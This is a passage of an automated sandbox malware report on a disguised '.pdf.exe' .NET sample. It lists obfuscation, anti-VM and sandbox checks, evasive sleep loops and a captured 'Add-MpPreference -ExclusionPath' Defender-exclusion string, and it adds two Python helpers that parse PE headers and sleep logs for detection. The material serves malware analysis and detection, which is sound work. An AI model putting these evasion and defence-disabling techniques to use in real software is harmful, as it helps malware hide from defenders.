Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.2.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.5.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.9.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.7.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.3.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.13.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 0_2_00DF92F5 push ds; ret 0_2_00DF9340
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 0_2_00DF9347 push ds; ret 0_2_00DF934C
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 0_2_00DF9361 push ds; retf 0_2_00DF9364
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 3_2_003E9361 push ds; retf 3_2_003E9364
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 3_2_003E9347 push ds; ret 3_2_003E934C
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 3_2_003E92F5 push ds; ret 3_2_003E9340
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_008C92F5 push ds; ret 5_2_008C9340
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_008C9347 push ds; ret 5_2_008C934C
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_008C9361 push ds; retf 5_2_008C9364
Source: initial sample Static PE information: section name: .text entropy: 7.8848412694
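The static PE lines in this report (32BIT_MACHINE and EXECUTABLE_IMAGE in the COFF characteristics; NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE and NX_COMPAT in DllCharacteristics; an executable .text section at entropy 7.88) come from three structures in the file header. The following Python is an added example, not part of the sandbox report: a minimal reader for exactly those structures plus a per-section entropy check. It builds its own constructed 32-bit PE in memory so it runs offline; the 7.0 entropy cut-off is an assumption, and for real samples the `pefile` library is the usual tool.

```python
import math
import struct

# Flag tables (subset), named as the report prints them.
FILE_CHARACTERISTICS = [("EXECUTABLE_IMAGE", 0x0002), ("32BIT_MACHINE", 0x0100), ("DLL", 0x2000)]
DLL_CHARACTERISTICS = [("DYNAMIC_BASE", 0x0040), ("NX_COMPAT", 0x0100),
                       ("NO_SEH", 0x0400), ("TERMINAL_SERVER_AWARE", 0x8000)]
SECTION_FLAGS = [("IMAGE_SCN_CNT_CODE", 0x00000020), ("IMAGE_SCN_MEM_EXECUTE", 0x20000000),
                 ("IMAGE_SCN_MEM_READ", 0x40000000), ("IMAGE_SCN_MEM_WRITE", 0x80000000)]


def _flags(value, table):
    return [name for name, bit in table if value & bit]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniform; packed or encrypted code sits near 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(blob: bytes) -> dict:
    """Read the COFF header, the optional header's DllCharacteristics and the section table."""
    if blob[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", blob, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", blob, opt)[0]
    dll_chars = struct.unpack_from("<H", blob, opt + 70)[0]  # same offset in PE32 and PE32+
    sections = []
    for i in range(nsections):
        name, _vsize, _va, raw_size, raw_ptr, _, _, _, _, sflags = struct.unpack_from(
            "<8sIIIIIIHHI", blob, opt + opt_size + 40 * i)
        raw = blob[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "entropy": round(shannon_entropy(raw), 2),
                         "flags": _flags(sflags, SECTION_FLAGS)})
    return {"is_32bit": machine == 0x014C,
            "format": {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, hex(magic)),
            "characteristics": _flags(chars, FILE_CHARACTERISTICS),
            "dll_characteristics": _flags(dll_chars, DLL_CHARACTERISTICS),
            "sections": sections}


def suspicious_sections(info: dict, threshold: float = 7.0) -> list:
    """Executable sections whose entropy exceeds the (assumed) cut-off, as the report flags .text."""
    return [s["name"] for s in info["sections"]
            if "IMAGE_SCN_MEM_EXECUTE" in s["flags"] and s["entropy"] > threshold]


def build_sample_pe(text_data: bytes) -> bytes:
    """Constructed minimal 32-bit PE with one .text section; headers only, not a loadable image."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew at 0x3C
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 224, 0x0002 | 0x0100)
    opt = bytearray(224)                                          # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<H", opt, 70, 0x0040 | 0x0100 | 0x0400 | 0x8000)
    raw_ptr = 512
    section = struct.pack("<8sIIIIIIHHI", b".text", len(text_data), 0x1000, len(text_data),
                          raw_ptr, 0, 0, 0, 0, 0x20 | 0x20000000 | 0x40000000)
    header = dos + b"PE\0\0" + coff + bytes(opt) + section
    return header.ljust(raw_ptr, b"\0") + text_data
```

Feeding the parser a section of uniformly distributed bytes reports entropy 8.0 and flags .text, while a section of repeated NOP bytes reports 0.0; compiled .NET IL normally lands well below 7, so a .text section near 7.9, as in this sample, is the static counterpart of the Assembly.Load(byte[]) and CreateDecryptor findings above.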

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information set: NOOPENFILEERRORBOX (115 identical events)

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.31c735c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 7084, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7040 Thread sleep count: 1168 > 30
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -239872s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7040 Thread sleep count: 2873 > 30
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -239761s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7076 Thread sleep time: -35197s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -239656s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -239546s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -239438s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -239297s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -239187s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -239047s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -238907s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -238781s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -238672s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -238547s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -238437s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -238328s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -238219s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -237797s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -237500s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -237391s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -237250s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -237141s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -236954s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -236594s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -236094s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -235204s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -235078s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060 Thread sleep time: -234953s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7064 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7040 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 4624 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7044 Thread sleep count: 890 > 30
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7044 Thread sleep count: 8962 > 30
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 240000
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239872
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239761
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239656
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239546
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239438
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239297
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239187
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 239047
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238907
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238781
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238672
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238547
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238437
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238328
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 238219
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 237797
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 237500
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 237391
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 237250
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 237141
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 236954
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 236594
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 236094
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 235204
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 235078
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 234953
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Window / User API: threadDelayed 1168
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Window / User API: threadDelayed 2873
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Window / User API: threadDelayed 890
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Window / User API: threadDelayed 8962
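Two reading notes on the sleep findings above, then an added example (mine, not part of the Joe Sandbox report). First, the unit suffix is printed as "s", but the values are milliseconds: 240000 is 4 minutes, which is what the "Contains long sleeps (>= 3 min)" signature is keying on, and the threshold -30000s is the usual 30-second per-call limit. Second, 922337203685477 is .NET TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks / 10000), i.e. an effectively unbounded wait, not a real timer. The parser below applies those interpretations to report lines of this shape and rolls them up per thread; the per-call (30 000 ms) and per-thread-call-count (30) thresholds mirror the report's, the 3-minute aggregate threshold and the flag names are my choices, and the input lines are a constructed excerpt.

```python
import re
from collections import defaultdict

# Constructed excerpt in the report's own line shape (the "Source: ..." prefix
# may or may not be present; the regex does not depend on it).
SAMPLE_LINES = """\
TID: 7060 Thread sleep time: -240000s >= -30000s
TID: 7040 Thread sleep count: 1168 > 30
TID: 7060 Thread sleep time: -239872s >= -30000s
TID: 7076 Thread sleep time: -35197s >= -30000s
TID: 7064 Thread sleep time: -922337203685477s >= -30000s
TID: 7044 Thread sleep count: 8962 > 30
"""

# .NET TimeSpan.MaxValue.Ticks is Int64.MaxValue; 10 000 ticks per millisecond.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000  # 922337203685477

SLEEP_RE = re.compile(r"TID:\s*(\d+)\s+Thread sleep (time|count):\s*(-?\d+)")


def parse_sleep_events(text):
    """Extract (tid, kind, value) triples from report lines.

    The negative sign is the relative-time convention of the underlying
    NtDelayExecution interval; the magnitude is what matters, and despite the
    printed "s" suffix it is in milliseconds (assumption stated in the lead-in).
    """
    events = []
    for m in SLEEP_RE.finditer(text):
        tid, kind, value = int(m.group(1)), m.group(2), int(m.group(3))
        events.append({"tid": tid, "kind": kind, "value": abs(value)})
    return events


def summarize(events, long_sleep_ms=180_000, loop_threshold=30):
    """Per-thread roll-up: total requested sleep, number of sleep calls, flags."""
    per_tid = defaultdict(lambda: {"total_ms": 0, "calls": 0, "infinite": False})
    for e in events:
        t = per_tid[e["tid"]]
        if e["kind"] == "time":
            if e["value"] >= TIMESPAN_MAX_MS:
                t["infinite"] = True          # sentinel, do not add to the total
            else:
                t["total_ms"] += e["value"]
        else:
            t["calls"] += e["value"]          # "sleep count" lines are call counts

    verdict = {}
    for tid, t in per_tid.items():
        flags = []
        if t["infinite"]:
            flags.append("infinite-wait")
        if t["total_ms"] >= long_sleep_ms:
            flags.append("long-sleep")        # would outlast a short sandbox run
        if t["calls"] > loop_threshold:
            flags.append("sleep-loop")        # many short sleeps: stalling loop
        verdict[tid] = {
            "minutes": round(t["total_ms"] / 60_000, 2),
            "calls": t["calls"],
            "flags": flags,
        }
    return verdict


if __name__ == "__main__":
    for tid, v in sorted(summarize(parse_sleep_events(SAMPLE_LINES)).items()):
        print(tid, v)
```

Reading the real report through this lens: thread 7060 alone requests well over an hour of sleep in ~4-minute slices, threads 7040 and 7044 spin through thousands of short sleeps, and three threads park on the TimeSpan.MaxValue sentinel. A sandbox that does not patch or accelerate sleeps would see little of the stealer logic inside its default analysis window.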
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Thread delayed: delay time: 35197
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp Binary or memory string: vmware
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Enables debug privileges
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process token adjusted: Debug (2 identical events)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_00E128A8 LdrInitializeThunk, 5_2_00E128A8
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916277322.0000000001710000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916277322.0000000001710000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916277322.0000000001710000.00000002.00020000.sdmp Binary or memory string: Progman
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916277322.0000000001710000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
